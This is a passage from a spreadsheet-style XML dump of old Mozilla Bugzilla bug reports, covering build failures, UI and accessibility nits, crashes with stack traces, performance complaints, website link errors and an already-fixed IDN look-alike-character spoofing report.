been met (e.g. the mozilla.org module owner who does the review) and another one
that keeps the money in a safe place until Beonex (which probably means me)
meets the requirements. Not sure if that's necessary though (you tell me)
since it's (time- and money-costly) overhead.
A big thanks to Matt Perry who made this possible! He is the first person who
ever offered more than a pocket money for such a thing to Beonex. There's a
threshold before any action makes sense and he got us over it.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-264755</t>
  </si>
  <si>
    <t>View Cookies extension updated</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
The View Cookie extension is updated.
The View Cookie extension shows the cookies of the current web page.
New in version 1.2:
- More cookie-details shown
- Possibility to remove cookies
Tested with good results in Firefox 0.9 1.0 Preview Release and 1.0 RC1 (I know
there is a seperate bugreport for RC1 but this is also a extension update).
View Cookies 1.2
{8F6A6FD9-0619-459f-B9D0-81DE065D4E21}
http://www.bitstorm.org/extensions/viewcookies.xpi
Homepage: http://www.bitstorm.org/extensions/
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>SEAMONKEY-54615</t>
  </si>
  <si>
    <t>when we fail to migrate we do it silently</t>
  </si>
  <si>
    <t>right now esther has a 4.x profile that is failing to migrate.  we are still
working on why it is failing.
but one thing to note is that when we fail we just silently fail.
we should at least pop up an alert dialog telling the user they failed.
from her console:
stdout directed to dynamic console
stderr directed to dynamic console
has multiple monitor apis is 1
Move window by 520404.5
New location for profile registry and user profile directories is -&gt; C:\WINDOWS\
APPLICATION DATA\Mozilla
Inside Migrate Profile routine.
start of pref migration
JavaScript error:
 line 0: uncaught exception: [Exception... Component returned failure code: 0x8
0520008 [nsIProfile.migrateProfile]  nsresult: 0x80520008 ()  locati
on: JS frame :: chrome://communicator/content/profile/profileSelection.js :: on
Start :: line 178  data: no]
we should wrap the call to profile.migrateProfile() in profileSelection.js with
a try and catch and on catch pop up an alert with the exception.
at least we'd get some bug reports.
tomorrow I'll work with esther to reproduce and debug this failure.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-249148</t>
  </si>
  <si>
    <t>404 Not Found: configPolicy Page.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-410176</t>
  </si>
  <si>
    <t>Select current folder in subscription dialog and add feed dialog</t>
  </si>
  <si>
    <t>Created attachment 294833
Patch
This is a suggestion for improving the user-friendliness of the feed subscriptions dialog.
Currently the subscription dialog always opens with the first folder selected even when the dialog is invoked from another folder. When selecting Subscribe... from the context menu of a feed folder in the folder pane or File &gt; Subscribe... when a feed folder is selected the subscription dialog should open with the current folder selected.
When selecting a folder inside the subscription dialog and pressing Add for adding a feed the new dialog for entering the feed URL by default has the root folder selected in the folder menulist. Instead the default folder should be the folder that was selected in the subscription dialog. If the subscription dialog was not opened from a specific folder no folder should be selected in the dialog (currently the first folder is selected) and the folder menulist should default to the server root (if this is selected a new folder is created for the feed).
When a feed has been added the feed list in the subscription dialog is reloaded and the first folder is selected. It would be better to open the folder that the feed was just added to and select the feed that was just added.
This patch implements these suggestions.
The patch also fixes a regression that was introduced with revision 1.26 of toolkit/content/widgets/menulist.xml: When pressing Edit on a feed the folder menulist in the feed properties dialog isn't properly initialized.</t>
  </si>
  <si>
    <t>bugzilla.mozilla.org-3</t>
  </si>
  <si>
    <t>CORE-281945</t>
  </si>
  <si>
    <t>Port modules/libutil to WinCE</t>
  </si>
  <si>
    <t>A few build changes to make this module compile for wince.</t>
  </si>
  <si>
    <t>WEBSITES-304379</t>
  </si>
  <si>
    <t>Labeled images on the right column of http://store.mozilla.org/ lead to product not category.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
The right column has three images each with text underneath much like a
labeled icon.  It looks like 3 links.
Reproducible: Always
Steps to Reproduce:
1. Click on an *image* in right column say the firefox logo on black
background above the other merchandise caption.
Actual Results:  
There is just one item a decal.  The other categories also appear to have just
one product.  Quite disappointing.  
Expected Results:  
Page listing other mechandise with several items.  Ditto for other categories.
Much later I clicked on another link and found that there are category listing
pages.  It turns out the problem is that in the right column the image links to
just the representative product pictured rather than to the expected list of
all the merchandise in the category named by the caption.
The right column has three images each with text underneath like labeled
icons.  It looks like 3 links not 6.
To avoid this confusion I suggest something like one of the following.  Either:
a. make it so clicking on the image above other merchandise links to the other
merchandise listing not just the one product (and ditto for other categories).  Or
b. add name of each featured product such as firefox decal under each image
so the image has its own caption and other merchandise category is clearly a
separate link.
Hope this helps!  Sail on!</t>
  </si>
  <si>
    <t>BUGZILLA-894221</t>
  </si>
  <si>
    <t>API documentation for Product.update incorrectly mentions the Product must have version error message</t>
  </si>
  <si>
    <t>Created attachment 776198
v1 patch
Trivial patch time. From the bug in brc:
3.https://bugzilla.redhat.com/docs/en/html/api/Bugzilla/WebService/Product.html#update
  -In Errors704 (Product must have version) You must specify a version for this product. But no parameters about 'version' is listed in Params.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-242381</t>
  </si>
  <si>
    <t>Ctrl-+/Ctrl-- font size adjust unsupported in older builds</t>
  </si>
  <si>
    <t>Bug 104332 fixed only trunk builds. Attempting Ctrl-+ or Ctrl-- using 0.9.61 in
OS/2 latest 1.4.2 fails to change font size in the output window and instead
returns:
[ERROR]	Internal error dispatching command font-size.
[ERROR]	[Exception... Component returned failure code: 0x80004001
(NS_ERROR_NOT_IMPLEMENTED) [nsIDOMXULElement.style] nsresult: 0x80004001
(NS_ERROR_NOT_IMPLEMENTED) location: JS frame ::
chrome://chatzilla/content/static.js :: getDefaultFontSize :: line 855 data: no]
After doing:
/eval getDefaultFontSize = function() { return 16 }
Ctrl-+ and Ctrl-- successfully change the font size displaying no error messages.</t>
  </si>
  <si>
    <t>CORE-472410</t>
  </si>
  <si>
    <t>URL bar highlight mistakenly switches colours on dark themes</t>
  </si>
  <si>
    <t>Created attachment 355682
Patch
On dark themes I've noticed the colour of the selection background when highlighted is actually reversed. We do this to improve contrast in some situations but it is not desired in this case.
This is due to a CSS rule in autocomplete that sets background-color: transparent. This gets passed down to the textbox where our algorithm doesn't like the luminous value of a transparent colour.
To fix this we must halt this inheritance. I've added a dummy background-color that is ignored in favour of the -moz-appearance rule in the same clause but it fixes the bug.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-407830</t>
  </si>
  <si>
    <t>bl-bldxp01 has stopped testing</t>
  </si>
  <si>
    <t>bl-bldxp01 hasn't reported a perf test result since the nightly machine (fx-win32-tbox) was stopped and then restarted earlier today.</t>
  </si>
  <si>
    <t>CALENDAR-257634</t>
  </si>
  <si>
    <t>Sunbird: lost  used calender files by updating to new version</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a3) Gecko/20040809 Mozilla Sunbird/0.2a  - (20040816)
different calender files (business private holidays...) had been used in the
former installation (about 200406xx - don't really remember but the problem had
been the same in the change to that version somme month earlier).
I changed to the above named new version of sunbird (by extracting zip file to a
new directory).
After starting sunbird only one (the standard calender has been reachable).
It's a not really short way to get the others back to use (see below).
Reproducible: Always
Steps to Reproduce:
1.have an existing sunbird with calenders in use.
2.end that programm
3.extract the zip file with the actual version
4. start the new program
5. see only one calender
Actual Results:  
adding new calendars with pointing to exact the old existing calendar files will
result in overwriting them with a new file without any events.
Work around: save the old files. create new ones in the above way. end sunbird.
replace the files by your backups. restart sunbird and finally enjoy.
Expected Results:  
good idea is to find a way that allows connecting existing calendar files.
better/best: taking all entries of the old version (by user preferencies)</t>
  </si>
  <si>
    <t>schadw</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-363592</t>
  </si>
  <si>
    <t>GCC build errors in nsImageWin.h and nsImageWin.cpp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ja rv:1.8.0.8) Gecko/20061105 Firefox/1.5.0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 ja rv:1.8.0.8) Gecko/20061105 Firefox/1.5.0.8
The patch of Bug 329299 seems to build with MinGW fail.
The same problem also on MOZILLA_1_8_BRANCH is caused though it is a record when failing in MOZILLA_1_8_0_BRANCH.
m:/mozilla/gfx/src/windows/nsImageWin.h: In constructor `nsImageWin::nsImageWin()':
m:/mozilla/gfx/src/windows/nsImageWin.h:289: warning: `nsImageWin::mHBitmap' will be initialized after
m:/mozilla/gfx/src/windows/nsImageWin.h:285: warning:   `PRUint8*nsImageWin::mAlphaBits'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:98: warning:   when initialized here
m:/mozilla/gfx/src/windows/nsImageWin.h:285: warning: `nsImageWin::mAlphaBits' will be initialized after
m:/mozilla/gfx/src/windows/nsImageWin.h:277: warning:   `nsColorMap*nsImageWin::mColorMap'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:98: warning:   when initialized here
m:/mozilla/gfx/src/windows/nsImageWin.h:290: warning: `nsImageWin::mBHead' will be initialized after
m:/mozilla/gfx/src/windows/nsImageWin.h:270: warning:   `PRPackedBool nsImageWin::mDIBTemp'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:98: warning:   when initialized here
m:/mozilla/gfx/src/windows/nsImageWin.h:275: warning: `nsImageWin::mRowBytes' will be initialized after
m:/mozilla/gfx/src/windows/nsImageWin.h:268: warning:   `PRPackedBool nsImageWin::mIsOptimized'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:98: warning:   when initialized here
m:/mozilla/gfx/src/windows/nsImageWin.h:282: warning: `nsImageWin::mDecodedY2' will be initialized after
m:/mozilla/gfx/src/windows/nsImageWin.h:269: warning:   `PRPackedBool nsImageWin::mIsLocked'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:98: warning:   when initialized here
m:/mozilla/gfx/src/windows/nsImageWin.h:288: warning: `nsImageWin::mImageCache' will be initialized after
m:/mozilla/gfx/src/windows/nsImageWin.h:266: warning:   `PRPackedBool nsImageWin::mInitialized'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:98: warning:   when initialized here
m:/mozilla/gfx/src/windows/nsImageWin.h:294: warning: `nsImageWin::mTimer' will be initialized after
m:/mozilla/gfx/src/windows/nsImageWin.h:271: warning:   `PRPackedBool nsImageWin::mImagePreMultiplied'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:98: warning:   when initialized here
m:/mozilla/gfx/src/windows/nsImageWin.cpp: In member function `virtual nsresult nsImageWin::DrawTile(nsIRender
ingContext&amp; nsIDrawingSurface* PRInt32 PRInt32 PRInt32 PRInt32 const nsRect&amp;)':
m:/mozilla/gfx/src/windows/nsImageWin.cpp:979: warning: converting to `PRInt32' from `float'
m:/mozilla/gfx/src/windows/nsImageWin.cpp:980: warning: converting to `PRInt32' from `float'
m:/mozilla/gfx/src/windows/nsImageWin.cpp: In function `void CompositeBitsInMemory(HDC__* int int int int
 int int int int PRInt32 PRUint8* MONOBITMAPINFO* PRUint8* tagBITMAPINFOHEADER* PRInt16)':
m:/mozilla/gfx/src/windows/nsImageWin.cpp:2044: error: `__try' undeclared (first use this function)
m:/mozilla/gfx/src/windows/nsImageWin.cpp:2044: error: (Each undeclared identifier is reported only once for e
ach function it appears in.)
m:/mozilla/gfx/src/windows/nsImageWin.cpp:2044: error: expected `' before '{' token
m:/mozilla/gfx/src/windows/nsImageWin.cpp:2050: error: `__except' undeclared (first use this function)
m:/mozilla/gfx/src/windows/nsImageWin.cpp:2050: error: expected `' before '{' token
make[5]: *** [nsImageWin.o] Error 1
make[5]: Leaving directory `/cygdrive/m/mozilla/obj-i686-pc-cygwin/gfx/src/windows'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/m/mozilla/obj-i686-pc-cygwin/gfx/src'
make[3]: *** [libs] Error 2
make[3]: Leaving directory `/cygdrive/m/mozilla/obj-i686-pc-cygwin/gfx'
make[2]: *** [tier_9] Error 2
make[2]: Leaving directory `/cygdrive/m/mozilla/obj-i686-pc-cygwin'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/cygdrive/m/mozilla/obj-i686-pc-cygwin'
make: *** [alldep] Error 2
The comment that remains in Bonsai is wrong. I believe that the patch of Bug 329299 is a cause in this.
Reproducible: Always
Steps to Reproduce:
1.The source is downloaded.
2.Build is started.
3.The error is reported.
Actual Results:  
Build fails.
Expected Results:  
It enjoys Firefox of the latest version in the family.
When trying by the following versions the published error log is the one.
binutils        20050610-1
gcc             3.3.3-3
gcc-core        3.3.3-3
gcc-g++         3.3.3-3
gcc-mingw-core  20040810-1
gcc-mingw-g++   20040810-1
make            3.80-1
mingw-runtime   3.10-1
w32api          3.7-1
Even if Current that mingw.org distributes is used it is confirmed to fail.</t>
  </si>
  <si>
    <t>nivoside</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-342986</t>
  </si>
  <si>
    <t>Links in Develop Your Own section of the main page could use better labels</t>
  </si>
  <si>
    <t>The Develop Your Own section of the main page  currently has a list of three links:
* Login to Submit 
* Documentation 
* Develop Your Own 
The first link is mis-titled in two ways:
- first you can do more than just submit an extension in the developer area
- second even if you're logged in already (as a developer) it's still labeled Login to Submit
I suggest Developer Panel which fixes both nits.
The third link is obviously redundant. It is also documentation and is prominently from . Also the title is the same as the section's title itself.
If there has to be three links for aesthetic reasons you could separate development part of the AMO FAQ  and add that link instead of Building an Extension one.</t>
  </si>
  <si>
    <t>TOOLKIT-432332</t>
  </si>
  <si>
    <t>duplicate chunks in client request</t>
  </si>
  <si>
    <t>The client request appears to repeat the same chunk over and over again in many cases. For example here is a snippet from the middle of one client request:
1003-100410041004-10051005-10061006-10091009-10101010-10111011-10121012-101310
13-10141014-101510151015-1016
The appropriate behavior should have been to write this as 1003-1016.</t>
  </si>
  <si>
    <t>marria</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-408536</t>
  </si>
  <si>
    <t>Find Bar: close button is not in the tab chain</t>
  </si>
  <si>
    <t>As the subject says: can't access the close button on the new find bar by tab or shift-tab.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-485609</t>
  </si>
  <si>
    <t>Set up and document hot-swappable deployment plan for mozilla.com</t>
  </si>
  <si>
    <t>Currently mozilla.com pushes are suboptimal:
- takes too much time
- best-case site temporarily gets stuck in a quasi-state
- worst-case site gets stuck in said state for a while
We should:
- keep another docroot with mozilla.com on it naming it something fun
- perform all deployment operations on that alternate docroot
- instantaneously switch from the hot docroot to the updated docroot
- repeat for subsequent releases
How IT decides to implement it is up to them but the main idea is to avoid ever having mozilla.com in a non-solid state (which could potentially happen no matter what RCS you use).</t>
  </si>
  <si>
    <t>CORE-461803</t>
  </si>
  <si>
    <t>need elementFromPoint that optionally ignores scrollframe</t>
  </si>
  <si>
    <t>See discussion in bug 459604.
Fennec needs to be able to find elements at a given point in the window which may or may not be visible in the viewport. document.elementFromPoint only works for elements that are scrolled into view. The current proposal is to add an elementFromPoint method to nsIDOMWindowUtils that takes an optional ignoreScrollFrame argument.</t>
  </si>
  <si>
    <t>CORE-283016</t>
  </si>
  <si>
    <t>Make it possible to blacklist characters in domain names</t>
  </si>
  <si>
    <t>This is IDN problem.
You should look UTF-8 for this report.
The 'DIVISION SLASH'(U+2215) is similar SLASH(/).
If this is used in sub-domain it is danger.
For example:
http://foo.comâˆ•bar.com/
This domain is foo.comâˆ•bar.com not foo.com.
This problem is not related to domain registry.
Because it is sub-domain.
This problem is not reproduced latest builds. Because bug 282270 is fixed.
However if we find another way for IDN problems this problem should be considered.</t>
  </si>
  <si>
    <t>FIREFOX-285064</t>
  </si>
  <si>
    <t>Rename Sanitize feature to  Clear Private Data</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en) AppleWebKit/125.5.6 (KHTML like Gecko) Safari/125.12
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050305 Firefox/1.0+
The function could be called 'Shredder' -- It is a term analogous to the removal and destruction of 
sensitive information. It provides a real-world metaphor that people can instantly relate with. It can also 
be easily represented in the form of an icon similar to the trash-can/recycle-bin found in Thunderbird.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>ryanrafferty</t>
  </si>
  <si>
    <t>WEBTOOLS-465549</t>
  </si>
  <si>
    <t>please advertise http://mxr.mozilla.org/build on MXR</t>
  </si>
  <si>
    <t>These are both pretty small repositories and it'd be great to have them easily searchable.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-228186</t>
  </si>
  <si>
    <t>The map done with a Flash movie doesn't show up</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031030
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031030
Hi guys
Not sure if it's because of JavaScript or something else but the map does
properly show up on Internet Explorer so I would assume that it should show up
with mozilla right?
It looks like there is much javascript and it could also be that the server
detects a non IE browser and doesn't send the same data. I didn't check that
since I don't have the tools to do it.
The page is in French so if you have some French people working on your team
you may want to ask them to check this out (comments will be in French too in
case you wanted to read them...).
Alexis
Reproducible: Always
Steps to Reproduce:
1. Go to the mentioned page
Actual Results:  
The map on the right is missing.
My Flash plugin works with all sorts of movies thus I'd be surprised that the
plug in doesn't work with these specifically.
Expected Results:  
Show the map with the Flash Plugin if at all possible.
The following is the Shockwave Flash plugin info. I installed it right after I
installed v1.6a of Mozilla so it isn't that old.
Shockwave Flash
    File name: NPSWF32.dll
    Shockwave Flash 7.0 r14
MIME Type 	Description 	Suffixes 	Enabled
application/x-shockwave-flash 	Macromedia Flash movie 	swf 	Yes
application/futuresplash 	FutureSplash movie 	spl 	Yes</t>
  </si>
  <si>
    <t>alexis_wilke</t>
  </si>
  <si>
    <t>CORE-210069</t>
  </si>
  <si>
    <t>Leaks caused by new in process accessibility events</t>
  </si>
  <si>
    <t>The nsIAccessibleEvent objects created by nsDocAccessible::FireToolkitEvent()
are leaking.
My mistake -- it shouldn't act like a getter it should release the newly
created object when finished.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-431358</t>
  </si>
  <si>
    <t>DOM Inspector doesn't work in Sunbird 0.6a1 Trunk builds</t>
  </si>
  <si>
    <t>When building Sunbird Trunk with --enable-extensions=inspector the DOM Inspector extension is correctly build but will fail to install.
Reason is that the supported Sunbird version is specified as 0.8pre to 0.8pre 
This is incorrect. Sunbirds version number in Trunk builds is still 0.6a1 
0.8pre was used for MOZILLA_1_8_BRANCH nightly builds.
Please adjust the version number to allow manual and automatic installation in Trunk builds during build process.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-71098</t>
  </si>
  <si>
    <t>Requesting CVS checkin access</t>
  </si>
  <si>
    <t>jatin</t>
  </si>
  <si>
    <t>FIREFOX-215197</t>
  </si>
  <si>
    <t>Plugin Configuration UI shows plugins that don't exist</t>
  </si>
  <si>
    <t>If you start a build with no plugins configured (like a new one from ftpmo) in a
profile that you had disabled plugins for content types with the deactivated
plugins show up in the plugin configuration UI even though the plugin isn't
configured. 
I know why this is. Fixing for .7.</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-593031</t>
  </si>
  <si>
    <t>FlightDeck</t>
  </si>
  <si>
    <t>flightdeck.zalewa.info is down</t>
  </si>
  <si>
    <t>It is used as development platform (aka nightly build)</t>
  </si>
  <si>
    <t>pzalewa</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-444416</t>
  </si>
  <si>
    <t>tree branches only have context from immedate parent</t>
  </si>
  <si>
    <t>the code that restores branch tracker &amp; cse tables needs to walk up to the tree root not just process the first parent.  this should improve the quality of the code on the branch and be a win with -Dtrees enabled.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-236073</t>
  </si>
  <si>
    <t>Removed extra fail from sentence.</t>
  </si>
  <si>
    <t>The first paragraph in the Error Logging section contains a sentence which
state s the word fail is entered twice. This change removes the extra word.</t>
  </si>
  <si>
    <t>carterj</t>
  </si>
  <si>
    <t>TOOLKIT-343282</t>
  </si>
  <si>
    <t>bfcache is slow</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060630 Minefield/3.0a1 ID:2006063012 [cairo]
after discussion on moz forum
we're not sure when this regressed but back and forwards speed has dropped a lot in the past week or so.
I have safebrowsing disabled so that shouldn't be the cause
repro:
open a page
open another page
move back and forwards
result:
it's slow far from instant</t>
  </si>
  <si>
    <t>CORE-372062</t>
  </si>
  <si>
    <t>Auto values for right and bottom in CSS clip rect broken</t>
  </si>
  <si>
    <t>Created attachment 256745
Testcase
See testcase.  The whole clip rect is incorrectly getting moved rather than just the top left corner changing.
(How the heck did anyone manage to implement auto clip rects without testing this?)
Should be easy to fix... I'l hold off on making a patch until my other clip fix gets worked out.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-480252</t>
  </si>
  <si>
    <t>Key Bindings</t>
  </si>
  <si>
    <t>keyboard equivalents for Redo  (Ctrl+Y) doesn't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090225 Minefield/3.2a1pre
Build Identifier: 0.1.3
Pressing Ctrl-Z to undo works but none of the others do.
Reproducible: Always
Steps to Reproduce:
1. Make edits in Bespin
2. Press Ctrl-Z a few times
3. Press Ctrl-Y.
4. Select something press Ctrl-X Ctrl-C Ctrl-V.
Actual Results:  
Ctrl-Z makes Undo happen (good!) but Ctrl-Y and the Cut/Copy/Paste trio do nothing
Expected Results:  
Why does Ctrl-Z work but not the rest?
Also all of the edit actions (Undo/Redo/Cut/Copy/Paste/Delete) are always disabled in the Edit menu and none show up in the context menu.
This happens in both Firefox 3.0.1 and runk nightly Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090225 Minefield/3.2a1pre ID:20090225033705.
Looking at editor.js' installKeyListener() code in http://hg.mozilla.org/labs/bespin/file/d27ef9919599/frontend/js/bespin/editor/editor.js : the actions for Ctrl-C/V/X are commented out there's no redo action bound to Ctrl-Y and Ctrl-Z is bound to this.actions.undoRedo although in current version Ctrl-Z only performs undo never redo.
You've got a lot of work ahead to do to make Bespin feel like a browser element but I'm confident you can do better than Flash text!</t>
  </si>
  <si>
    <t>CORE-16311</t>
  </si>
  <si>
    <t>Line selection blocked by style changes</t>
  </si>
  <si>
    <t>* TITLE/SUMMARY
[PP] Triple-click selection blocked by style changes
(writing up as courtesy for mjudge)
* STEPS TO REPRODUCE
0) Launch Apprunner
1) View Demo 0 (from the Debug menu)
2) Attempt to triple-click in any of the paragraphs with style changes (e.g.
This is a basic paragraph... or This paragraph is aligned left...
* RESULT
 - What happened
The selection will be blocked on each end upon reaching a style change (e.g.
Bold italics etc). e.g. in the first example the selection would be limited
to This is a basic paragraph with
 - What was expected
Selection only to be blocked by a line break.
* REGRESSION
 - Occurs On
        Mac OS Apprunner (1999101308 optimized build)
        Linux Apprunner (1999101308 optimized build)
 - Doesn't Occur On
        Win32 Apprunner (1999101308 optimized build [NT 4 Service Pack 5]) ---
triple click not supported
* CONFIGURATIONS TESTED
- [Mac] Beige Power Mac G3 (266 MHz PowerPC 750) 96 MB RAM (VM on 1 MB of VM
used) 1024x768 (Thousands of Colors) Mac OS 8.6
- [Win32] Vectra VL (233 MHz P2) 96 MB RAM 800x600 (True Color) NT 4.0 SP5.
- [Linux] Vectra VL (266 MHz P2) 96 MB RAM. Red Hat Linux 6.0 (GNOME).</t>
  </si>
  <si>
    <t>elig</t>
  </si>
  <si>
    <t>CORE-326714</t>
  </si>
  <si>
    <t>GNOME/GTK icon code is extremely slow</t>
  </si>
  <si>
    <t>N.B.: Most people don't use builds with the code that this bug is complaining about -- it's not enabled in release builds since --disable-gnomeui defaults to doing a configure test for the version and the build machines don't *currently* have that version although that could change in the future.  But it does show up in builds that people do on relatively new distributions.
The GNOME icon code in modules/libpr0n/decoders/icon/gtk/ is really really slow.  I've described this on IRC in the past and some people had useful suggestions.  On my machine it takes a few hundred milliseconds *per icon*.  This is a significant slowdown just when opening a dialog that has OK and Cancel buttons (since we do two such icon loads in that case at least the first time).  But it's a much much more serious problem for bookmarks where we do an icon load for every single file: URL in any displayed bookmarks -- if a bookmarks folder or the personal toolbar has a lot of file: URLs in it this is a huge slowdown and can lead to multi-second delays waiting for bookmarks menus to open.
Using some printf(!) timing since profiling of things involving X server etc. can be a little unreliable the slowest pieces of nsIconChannel::InitWithGnome seem to be:
 * the call to gnome_icon_lookup typically around 300ms
 * the g_object_unref of the icon theme (odd) typically around 50ms
 * the pixmap manipulation from there to the end of the function varies a lot -- sometimes it's almost instantaneous sometimes it's near 50ms sometimes in between
When I brought this up on IRC a bunch of people had suggestions for improving the last part but that's actually not the bulk of the time.
I don't think Mozilla should ship this code in official builds until these problems are resolved.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-421787</t>
  </si>
  <si>
    <t>NSS portion of build uses continuation lines in variable definition that is used in an AC_SUBST</t>
  </si>
  <si>
    <t>Created attachment 308293
patch v1
The code that defines NSS_LIBS and NSS_DEP_LIBS in configure.in uses continuation lines in the variable definition that is later used in an AC_SUBST( ...).  This is not allowed because the build system splits the sed script used to process all the AC_SUBST( ... )'s at 90 line boundaries which could end up being in the middle of a continuation line.
THe current situation is that adding any AC_SUBST( ... ) before the ones for NSS_LIBS and NSS_DEP_LIBS will result in a very difficult to figure out build failure.
This issue is currently preventing the code for bug 305782 which is targeted for beta5 from landing.</t>
  </si>
  <si>
    <t>CORE-449746</t>
  </si>
  <si>
    <t>Switch content is not displayed with requiredExtensions=http://www.w3.org/1999/xhtml or requiredExtensions=http://www.w3.org/1998/Math/MathML</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr rv:1.9b5) Gecko/2008041514 Firefox/3.0b5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 fr rv:1.9b5) Gecko/2008041514 Firefox/3.0b5
I made an XHTML+MathML+SVG page with Amaya. A  requiredExtensions=http://www.w3.org/1999/xhtml is attached to the  element. This attribute prevents Firefox to render the foreignObject properly.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-315771</t>
  </si>
  <si>
    <t>[FIX]Use atoms for the id and name table</t>
  </si>
  <si>
    <t>We should parse HTML name attributes as atoms then use atoms throughout the hashtable that lives in nsHTMLDocument.
sicking do you want to do this?  Or should I?</t>
  </si>
  <si>
    <t>CORE-420223</t>
  </si>
  <si>
    <t>Add |setDelegate:nil| call in the |nsMenuBarX| destructor.</t>
  </si>
  <si>
    <t>Created attachment 306422
Patch V1
We are seeing a deallocated |MessageDelegate| object getting sent the |menuNeedsUpdate:| message.
 We see this when Songbird closes the player window to re-apply a new feather (or skin). While the window is closing and the new resources are getting loaded - if a user clicks on the menubar we get a SIGTRAP crash. Running the build with |NSZombieEnabled| showed this:
2008-02-28 18:13:49.315 songbird[56131:10b] *** -[MenuDelegate menuNeedsUpdate:]: message sent to deallocated instance 0x438722b0
The sample stack trace looks like this:
#0	0x96cc96ec in objc_msgSend
#1	0x92067484 in -[NSMenu _populate:]
#2	0x920673ae in AppKitMenuEventHandler
#3	0x931c7fc3 in DispatchEventToHandlers
#4	0x931c73fd in SendEventToEventTargetInternal
#5	0x931c7262 in SendEventToEventTargetWithOptions
#6	0x9320c675 in SendMenuPopulate
#7	0x93221563 in SendMenuOpening
#8	0x93221177 in DrawTheMenu
#9	0x93220f53 in MenuChanged
#10	0x9321fdaa in TrackMenuCommon
#11	0x9321b9b5 in MenuSelectCore
#12	0x9321b509 in _HandleMenuSelection2
#13	0x9321b37d in _HandleMenuSelection
#14	0x91fa3f77 in _NSHandleCarbonMenuEvent
#15	0x91f0ac72 in _DPSNextEvent
#16	0x91f0a08e in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:]
This can easily be fixed by setting the |mMacMenu| delegate to nil:
[mMacMenu setDelegate:nil]
See the attached patch.</t>
  </si>
  <si>
    <t>CORE-244220</t>
  </si>
  <si>
    <t>[FIX]newURI fails for external protocols blocked via prefs</t>
  </si>
  <si>
    <t>The problem is that newURI tries to get a protocol handler.  That fails for
protocols blocked via prefs and then the URI object is not created....  This is
a problem in places where we want to pass URIs around as nsIURI.
I'd think we would want to block these protocols on the
newChannel/getProtocolHandler level but _not_ the newURI level (as in maybe
newURI should fall back to the external protocol handler or by-hand construction
of an nsSimpleURI?)
darin I'm willing to code that up but I'd like to hear what you consider
acceptable solutions to this problem first.  )</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-479043</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/projects/l10n/customizable-code.html</t>
  </si>
  <si>
    <t>Links under  Life Cycle of a Patch concerning the localization are both broken.
(Make sure that your code is localizable. There are 62 registered localization projects of which seven to ten are currently active.)</t>
  </si>
  <si>
    <t>lukas.diener</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-477362</t>
  </si>
  <si>
    <t>Refresh dashboard project list after import</t>
  </si>
  <si>
